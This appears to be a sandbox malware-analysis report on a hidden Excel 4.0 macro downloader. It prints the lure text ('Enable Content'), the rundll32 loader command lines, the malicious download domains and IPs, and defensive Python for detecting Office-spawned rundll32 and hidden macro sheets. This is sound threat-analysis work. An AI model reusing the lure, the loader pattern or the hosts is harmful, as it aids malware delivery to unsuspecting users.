
Analysis Report diagram-419065597.xls

Overview

General Information

Sample Name: diagram-419065597.xls
Analysis ID: 412973
MD5: ec968745c407ee67d80d18c25abaa8d2
SHA1: 922818d6a781b3780541837975c54baa4e7a3349
SHA256: 431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 1984 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2672 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: rundll32 ..\ritofm.cvm,DllRegisterServer
  • CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer
  • CommandLine|base64offset|contains: ]
  • Image: C:\Windows\System32\rundll32.exe
  • NewProcessName: C:\Windows\System32\rundll32.exe
  • OriginalFileName: C:\Windows\System32\rundll32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 648
  • ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer
  • ProcessId: 1984
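The Sigma hit above fires on the parent/child image names alone. As an added example that is not part of the Joe Sandbox report or of the Sigma project, the Python below reproduces that logic over process-creation events and adds a second check suggested by the command lines in this report: rundll32 invoked with the DllRegisterServer export on a module whose extension is not .dll (..\ritofm.cvm). The Office and shell process lists are an assumption modelled on the rule's published selection, not the rule text, and the events are constructed from this report's process tree plus one benign control launch; they are not sandbox output.

```python
import re

# Parent/child names modelled on the Sigma rule "Microsoft Office Product
# Spawning Windows Shell"; the exact lists are an assumption, not the rule text.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe",
                  "mspub.exe", "outlook.exe", "visio.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe",
                  "schtasks.exe", "wmic.exe", "hh.exe", "forfiles.exe"}

# [<path>\]rundll32[.exe] <module>,<export>; the module may be quoted or
# relative, as in this report: rundll32 ..\ritofm.cvm,DllRegisterServer
RUNDLL32_ARGS = re.compile(
    r'^\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+"?(?P<module>[^",]+?)"?\s*,\s*(?P<export>\w+)',
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawning_shell(ev):
    """Sigma-style check: an Office binary is the direct parent of a shell/LOLBin."""
    return (basename(ev["ParentImage"]) in OFFICE_PARENTS
            and basename(ev["Image"]) in SHELL_CHILDREN)


def rundll32_dllregisterserver_non_dll(ev):
    """rundll32 calling DllRegisterServer on a module that is not named *.dll."""
    if basename(ev["Image"]) != "rundll32.exe":
        return False
    m = RUNDLL32_ARGS.match(ev["CommandLine"])
    if not m:
        return False
    module = m.group("module").strip().lower()
    return m.group("export").lower() == "dllregisterserver" and not module.endswith(".dll")


RULES = {
    "office_spawning_shell": office_spawning_shell,
    "rundll32_dllregisterserver_non_dll": rundll32_dllregisterserver_non_dll,
}


def triage(events):
    """Map ProcessId -> matched rule names, for events that hit at least one rule."""
    hits = {}
    for ev in events:
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[ev["ProcessId"]] = matched
    return hits


# Constructed events: the two rundll32 launches from this report's process tree
# plus one benign rundll32 launch from Explorer as a control. Not sandbox output.
SAMPLE_EVENTS = [
    {"ProcessId": 1984, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\ritofm.cvm,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"ProcessId": 2672, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\ritofm.cvm1,DllRegisterServer",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"ProcessId": 3100, "Image": r"C:\Windows\System32\rundll32.exe",  # constructed control
     "CommandLine": r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Both rundll32 children from the report match both checks; the control launch from Explorer with a real shell32.dll matches neither. The second check is narrower than the Sigma rule and survives a parent that is not an Office binary, which matters once the loader is re-launched by something other than EXCEL.EXE.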

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: diagram-419065597.xls | ReversingLabs: Detection: 14%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: stateoftheartacademy.com.br
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 108.167.180.130:443 (reported twice)
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: stateoftheartacademy.com.br
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | HTTPS traffic detected: 108.167.180.130:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 208.91.198.131:443 -> 192.168.2.22:49170 version: TLS 1.2

The msn.com, hotmail.com, msnbc.com, windowsmedia.com, windows.com, icra.org and "localizability" strings are standard resource strings of Windows components loaded into rundll32.exe; the report itself marks every one of them not malicious and rates them safe or high-reputation, so they are not indicators for this sample. The two .dr files are CryptnetUrlCache entries written while Excel validated the servers' TLS certificate chains (IdenTrust root, Windows authroot.stl), which is also why apps.identrust.com and ctldl.windowsupdate.com appear among the whitelisted domains in the General Information section. The network indicators worth keeping are the two DNS names and TLS endpoints: stateoftheartacademy.com.br (108.167.180.130) and dsafarm.com (208.91.198.131).

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas' " ' "
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 2 Once You have Enable Editing, please click
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 14 , from the yellow bar above 15 D e 16 17 I 18 I WHY I CANNOT OPEN THIS DOCUME
Source: Document image extraction number: 5 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5 | Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14 | Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulas
Source: diagram-419065597.xls | Initial sample: CALL
Source: diagram-419065597.xls | Initial sample: CALL
Source: diagram-419065597.xls | Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: diagram-419065597.xls | Initial sample: Sheet size: 14900
Source: diagram-419065597.xls | OLE indicator, VBA macros: true
Source: rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
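The "hidden Excel 4.0 Macro sheet" finding above comes from the BOUNDSHEET records of the BIFF8 Workbook stream: each record carries the sheet type (dt = 0x01 for an Excel 4.0 macro sheet) and its visibility state (hsState 0 visible, 1 hidden, 2 very hidden; the last cannot be undone from the Excel UI). As an added example that is not part of the Joe Sandbox report, the Python below walks a Workbook stream and lists macro sheets that are not visible. It expects the raw Workbook stream already extracted from the OLE container (with olefile, for instance, which is assumed and not shown); because the report does not include the file's bytes, the stream here is constructed inline for the run. Formula content, which is what the CALL/EXEC findings are based on, is not parsed.

```python
import struct

# BIFF record ids (MS-XLS). BOUNDSHEET describes each sheet in the workbook.
BOF, EOF, BOUNDSHEET = 0x0809, 0x000A, 0x0085

# dt (sheet type) from the high byte of the BOUNDSHEET hsState/dt field
SHEET_TYPES = {0x00: "worksheet", 0x01: "macro", 0x02: "chart", 0x06: "vb_module"}
# hsState from the low two bits of the same field
VISIBILITY = {0: "visible", 1: "hidden", 2: "very_hidden"}


def iter_records(stream):
    """Yield (record_id, payload) for each BIFF record up to the first EOF.

    The workbook globals substream, which holds every BOUNDSHEET record, is the
    first BOF..EOF block, so stopping at the first EOF is sufficient here.
    """
    pos = 0
    while pos + 4 <= len(stream):
        rec_id, length = struct.unpack_from("<HH", stream, pos)
        payload = stream[pos + 4 : pos + 4 + length]
        yield rec_id, payload
        pos += 4 + length
        if rec_id == EOF:
            break


def parse_boundsheet(payload):
    """Decode a BOUNDSHEET payload into (sheet_name, sheet_type, visibility)."""
    _lb_ply_pos, flags16, cch = struct.unpack_from("<IHB", payload, 0)
    high_byte = payload[7]          # ShortXLUnicodeString fHighByte flag
    raw = payload[8:]
    if high_byte & 1:
        name = raw[: cch * 2].decode("utf-16-le")
    else:
        name = raw[:cch].decode("latin-1")
    sheet_type = SHEET_TYPES.get(flags16 >> 8, f"unknown_{flags16 >> 8:#x}")
    visibility = VISIBILITY.get(flags16 & 3, "unknown")
    return name, sheet_type, visibility


def find_hidden_macro_sheets(stream):
    """Return [(name, visibility)] for Excel 4.0 macro sheets that are not visible."""
    hits = []
    for rec_id, payload in iter_records(stream):
        if rec_id != BOUNDSHEET:
            continue
        name, sheet_type, visibility = parse_boundsheet(payload)
        if sheet_type == "macro" and visibility != "visible":
            hits.append((name, visibility))
    return hits


def boundsheet(name, sheet_type, visibility, utf16=False):
    """Build one BOUNDSHEET record; used only to construct the sample stream."""
    flags16 = (sheet_type << 8) | visibility
    encoded = name.encode("utf-16-le") if utf16 else name.encode("latin-1")
    body = struct.pack("<IHBB", 0, flags16, len(name), 1 if utf16 else 0) + encoded
    return struct.pack("<HH", BOUNDSHEET, len(body)) + body


# Constructed sample Workbook stream: a visible worksheet followed by a very
# hidden Excel 4.0 macro sheet, the layout this report flags. These are not
# bytes from the analysed file.
SAMPLE_STREAM = (
    struct.pack("<HH", BOF, 16) + bytes(16)
    + boundsheet("Sheet1", 0x00, 0)
    + boundsheet("Macro1", 0x01, 2, utf16=True)
    + struct.pack("<HH", EOF, 0)
)

if __name__ == "__main__":
    for name, visibility in find_hidden_macro_sheets(SAMPLE_STREAM):
        print(f"{name}: {visibility} Excel 4.0 macro sheet")
```

A very hidden macro sheet is a strong static indicator on its own: legitimate workbooks that use XLM are rare, and ones that set hsState to 2 are rarer still. Pair the sheet listing with the lure text seen in the screenshots (an "Enable Content" instruction on the only visible sheet) and the sample can be triaged without detonation.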
Source: classification engine | Classification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\89EE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDF27.tmp
Source: diagram-419065597.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: diagram-419065597.xls | ReversingLabs: Detection: 14%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Each rundll32 launch was followed by an automated OK click, i.e. each produced a dialog. That is the behaviour you would see if rundll32 could not load the module at ..\ritofm.cvm; this excerpt does not show the download of ritofm.cvm, so whether the second stage actually ran cannot be confirmed from the visible report.
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (reported 27 times)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported 2 times)

Mitre Att&ck Matrix

Techniques matched by the report's signatures, by tactic. The bracketed digits are the superscript match counts exactly as rendered in the original matrix cells; the matrix's unmatched placeholder cells are omitted.
  • Execution: Scripting [21], Exploitation for Client Execution [23]
  • Privilege Escalation: Process Injection [1]
  • Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Rundll32 [1], Process Injection [1], Scripting [21]
  • Discovery: File and Directory Discovery [1], System Information Discovery [2]
  • Command and Control: Encrypted Channel [2], Non-Application Layer Protocol [1], Application Layer Protocol [2], Ingress Tool Transfer [1]
No techniques were matched under Initial Access, Persistence, Credential Access, Lateral Movement, Collection, Exfiltration, Network Effects, Remote Service Effects or Impact.



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
diagram-419065597.xls | 15% | ReversingLabs | Document-Office.Downloader.EncDoc
(The signature section above quotes the same ReversingLabs result as 14%; both figures appear in the original report.)

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
stateoftheartacademy.com.br | 0% | Virustotal | -
dsafarm.com | 1% | Virustotal | -

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe (listed 4 times)
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe (listed 4 times)

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
stateoftheartacademy.com.br | 108.167.180.130 | true | false | - | unknown
dsafarm.com | 208.91.198.131 | true | false | - | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 4 times) | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2121014308.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113474322.0000000001D97000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 4 times) | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2120674840.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2113337794.0000000001BB0000.00000002.00000001.sdmp | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
108.167.180.130 | stateoftheartacademy.com.br | United States | 46606 | UNIFIEDLAYER-AS-1US | false
208.91.198.131 | dsafarm.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412973
Start date: 13.05.2021
Start time: 05:15:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 19s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: diagram-419065597.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.evad.winXLS@5/11@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.42, 205.185.216.10, 93.184.221.240
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
108.167.180.130 | EFT Remittance Details.vbs | malicious
208.91.198.131 | 240000434383.doc.js | malicious
208.91.198.131 | 240000434383.doc.js | malicious

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Contacted IP
PUBLIC-DOMAIN-REGISTRYUS | PRODUCT RANGE # 363688.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | 📠Lori's Fax VM-002.html | malicious | 199.79.62.225
PUBLIC-DOMAIN-REGISTRYUS | PRODUCT INQUIRY FROM PAKISTAN.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | tLes2JdtRw.exe | malicious | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | SecuriteInfo.com.Malware.AI.4228845530.13946.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Letter of Demand.doc | malicious | 103.21.59.173
PUBLIC-DOMAIN-REGISTRYUS | 7b4NmGxyY2.exe | malicious | 162.215.241.145
PUBLIC-DOMAIN-REGISTRYUS | catalog-1908475637.xls | malicious | 199.79.62.12
PUBLIC-DOMAIN-REGISTRYUS | catalog-1908475637.xls | malicious | 199.79.62.12
PUBLIC-DOMAIN-REGISTRYUS | INV74321.exe | malicious | 119.18.54.126
PUBLIC-DOMAIN-REGISTRYUS | NAVTECO_R1_10_05_2021,pdf.exe | malicious | 116.206.104.92
PUBLIC-DOMAIN-REGISTRYUS | #10052021.exe | malicious | 116.206.104.66
PUBLIC-DOMAIN-REGISTRYUS | shipping docs and BL_pdf.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | PDF.9066721066.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | Payment Advice Note from 10.05.2021 to 608760.exe | malicious | 208.91.199.224
PUBLIC-DOMAIN-REGISTRYUS | 551f47ac_by_Libranalysis.xlsm | malicious | 162.222.225.153
PUBLIC-DOMAIN-REGISTRYUS | 551f47ac_by_Libranalysis.xlsm | malicious | 162.222.225.153
PUBLIC-DOMAIN-REGISTRYUS | export of document 555091.xlsm | malicious | 103.21.58.29
PUBLIC-DOMAIN-REGISTRYUS | RFQ-20283H.exe | malicious | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | BTC-2021.exe | malicious | 208.91.199.225
UNIFIEDLAYER-AS-1US | e09ca2b3_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | a46eb47f_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | aabc6e16_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 6f75ecf8_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 2a9335bd_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 3e917917_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 73f69405_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 4ebc60e0_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | eacf01bf_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | aabc6e16_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | dd9d35c4_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | a46eb47f_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 3e917917_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 6f75ecf8_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | eacf01bf_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 73f69405_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 4ebc60e0_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | dd9d35c4_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 504acdb7_by_Libranalysis.dll | malicious | 162.241.209.225
UNIFIEDLAYER-AS-1US | 27e9ef61_by_Libranalysis.dll | malicious | 162.241.209.225

Both ASNs are shared web-hosting networks; ASN overlap with other malicious samples therefore says little about this campaign. The per-sample contacted IPs are the useful column: note that none of the context samples contacted the two IPs seen in this run.

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Contacted IPs
7dcce5b76c8b17472d024758970a406b | ACH WIRE PAYMENT ADVICE.xlsx | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 85095f36_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 0b31c0f0_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | Product specification.xlsx | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | statistic-482095214.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 090811fa_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 54402971_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | afdab907_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 7bYDInO.rtf | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 8100c344_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 32154f4c_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
